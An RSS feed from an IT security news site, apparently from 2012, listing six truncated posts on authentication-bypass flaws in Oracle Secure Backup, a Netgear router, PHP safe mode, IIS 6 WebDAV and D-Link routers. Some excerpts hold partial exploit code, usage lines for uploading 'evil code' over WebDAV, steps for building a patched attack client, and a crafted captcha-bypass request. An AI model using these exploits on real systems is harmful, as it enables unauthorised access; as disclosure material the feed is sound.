<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; bypass</title>
	<atom:link href="http://www.goitworld.com/tag/bypass/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit</title>
		<link>http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/</link>
		<comments>http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 12:52:58 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[secure]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>#!/bin/bash </p>
<p>#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability   <br />#1-day exploit for CVE-2009-1977 and CVE-2009-1978 </p>
<p>#PoC script successfully tested on:   <br />#Oracle Secure Backup Server 10.3.0.1.0_win32_release    <br />#MS Windows Professional XP SP3 </p>
<p>#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.   <br />#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart     <br />#authentication bypass and a trivial command injection, resulting in arbitrary command execution. </p>
<p>#References:&#8230; <a href="http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Netgear DG632 Router Authentication Bypass Vulnerability</title>
		<link>http://www.goitworld.com/netgear-dg632-router-authentication-bypass-vulnerability/</link>
		<comments>http://www.goitworld.com/netgear-dg632-router-authentication-bypass-vulnerability/#comments</comments>
		<pubDate>Tue, 16 Jun 2009 09:49:34 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[Netgear]]></category>
		<category><![CDATA[router]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/netgear-dg632-router-authentication-bypass-vulnerability/</guid>
		<description><![CDATA[<p>Product Name: Netgear DG632 Router   <br />Vendor: <a href="http://www.netgear.com">http://www.netgear.com</a>    <br />Date: 15 June, 2009    <br />Author: tom@tomneaves.co.uk &#60; tom@tomneaves.co.uk &#62;    <br />Original URL: <a href="http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt">http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt</a>    <br />Discovered: 18 November, 2006    <br />Disclosed: 15 June, 2009 </p>
<p>I. DESCRIPTION </p>
<p>The Netgear DG632 router has a web interface which runs on port 80.    <br />This allows an admin to login and administer the device&#8217;s settings.     <br />Authentication of this web interface is handled by a script called    <br />&#34;webcm&#34; residing in &#34;/cgi-bin/&#34; which redirects to the relevant pages    <br />depending on successful user authentication. Vulnerabilities in this    <br />interface enable an&#8230; <a href="http://www.goitworld.com/netgear-dg632-router-authentication-bypass-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/netgear-dg632-router-authentication-bypass-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>PHP &lt;= 5.2.9 Local Safemod Bypass Exploit</title>
		<link>http://www.goitworld.com/php-529-local-safemod-bypass-exploit/</link>
		<comments>http://www.goitworld.com/php-529-local-safemod-bypass-exploit/#comments</comments>
		<pubDate>Wed, 27 May 2009 04:34:43 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/php-529-local-safemod-bypass-exploit/</guid>
		<description><![CDATA[<p>Title&#160; : PHP &#60;= 5.2.9 SafeMod Bypass Vulnerability (win32)    <br />Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect    <br />Vendor&#160; Site&#160;&#160; : www.php.net </p>
<p>Vulnerability Discoverd by&#160;&#160; : www.abysssec.com </p>
<p>Description : </p>
<p>Here is another safemod bypass vulnerability exist in php &#60;= 5.2.9 on windows .   <br />the problem comes from OS behavior &#8211; implement&#160; and interfacing between php    <br />and operation systems directory structure . the problem is php won&#8217;t tell difference     <br />between directory browsing in linux and windows this can lead attacker to ability     <br />execute his / her commands on&#8230; <a href="http://www.goitworld.com/php-529-local-safemod-bypass-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/php-529-local-safemod-bypass-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)</title>
		<link>http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass-exploit-php/</link>
		<comments>http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass-exploit-php/#comments</comments>
		<pubDate>Sat, 23 May 2009 04:07:00 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[webdav]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/?p=189</guid>
		<description><![CDATA[<p>&#60;?</p>
<p>print_r(&#8216;<br />
********  IIS 6 WEBDAV Exploit.By <a href="mailto:racle@tian6.com">racle@tian6.com</a> &#38;&#38; Securiteweb.org  ********<br />
                                                        <br />
       Usage: php &#8216;.$argv[0].&#8217; source/path/put host path   <br />
       Example: php &#8216;.$argv[0].&#8217; source <a href="http://www.tian6.com">www.tian6.com</a> /blog/readme.asp       <br />
       Example2: php &#8216;.$argv[0].&#8217; path <a href="http://www.tian6.com">www.tian6.com</a> /secret/<br />
       Example3: php &#8216;.$argv[0].&#8217; put <a href="http://www.tian6.com">www.tian6.com</a> /secret/ test.txt(evil code as test.txt)<br />
****************************************************************<br />
&#8216;);</p>
<p>//verification du debut<br />
if($argv[1]!=&#8221;source&#8221;&#38;&#38;$argv[1]!=&#8221;path&#8221;&#38;&#38;$argv[1]!=&#8221;put&#8221;){echo &#8220;Choose a action,source or path or put.&#8221;;die;}<br />
else {$action=$argv[1];}</p>
<p>if(stristr($argv[2],&#8221;<a href="http://&#34;)){echo">http://&#8221;)){echo</a> &#8220;No http:// in the host!&#8221;;die;}<br />
else{$host=$argv[2];}</p>
<p>if(stristr($argv[3],&#8221;/&#8221;)==false){echo &#8220;Where is the / ?&#8221;;die;}<br />
else{$path=$argv[3];}<br />
//sent<br />
function sent($sock)  <br />
{  <br />
global  $host, $html;  <br />&#8230; <a href="http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass-exploit-php/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass-exploit-php/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft IIS6 WebDAV Remote Authentication Bypass Exploit (patch)</title>
		<link>http://www.goitworld.com/microsoft-iis6-webdav-remote-authentication-bypass-exploit-patch/</link>
		<comments>http://www.goitworld.com/microsoft-iis6-webdav-remote-authentication-bypass-exploit-patch/#comments</comments>
		<pubDate>Fri, 22 May 2009 02:30:10 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[webdav]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/microsoft-iis6-webdav-remote-authentication-bypass-exploit-patch/</guid>
		<description><![CDATA[<p> Blog with a detailed description:   <br /># <a href="http://www.skullsecurity.org/blog/?p=285">http://www.skullsecurity.org/blog/?p=285</a>    <br />#     <br /># And the patch itself:    <br /># <a href="http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch">http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch</a>    <br />#    <br /># &#62; mkdir cadaver-h4x    <br /># &#62; cd cadaver-h4x    <br /># &#62; wget <a href="http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch">http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch</a>    <br /># &#8211;snip&#8211;    <br /># &#62; wget <a href="http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz">http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz</a>    <br /># &#8211;snip&#8211;    <br /># &#62; tar xzvf cadaver-0.23.2.tar.gz    <br /># &#8211;snip&#8211;    <br /># &#62; cd cadaver-0.23.2/    <br /># &#62; patch -p1 &#60; ../cadaver-0.23.2-h4x.patch    <br /># patching file lib/neon/ne_basic.c    <br /># patching file lib/neon/ne_request.c    <br /># patching file lib/neon/ne_uri.c    <br /># &#62; ./configure    <br /># &#8211;snip&#8211;    <br /># &#62; make    <br&#8230; <a href="http://www.goitworld.com/microsoft-iis6-webdav-remote-authentication-bypass-exploit-patch/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-iis6-webdav-remote-authentication-bypass-exploit-patch/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>D-Link Captcha Bypass</title>
		<link>http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass/</link>
		<comments>http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass/#comments</comments>
		<pubDate>Mon, 18 May 2009 03:43:55 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[d-link]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass/</guid>
		<description><![CDATA[<p><strong>D-Link</strong> released new firmware designed to protect against malware that     <br />alters DNS settings by logging in to the router using default administrative     <br />credentials. There is a flaw in the captcha authentication system that allows     <br />an <strong>attacker</strong> to glean your WiFi WPA pass phrase from the router with only user-level     <br />access, and without properly solving the captcha. </p>
<p>When you login with the captcha enabled, the request looks like this: </p>
<p>GET /post_login.xmlhash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&#38;auth_code=0C52    <br />F&#38;auth_id=268D2 </p>
<p>The hash is a salted MD5 hash of your password, the auth_code is the captcha value that    <br />you entered, and&#8230; <a href="http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-iis-60-webdav-remote-authentication-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

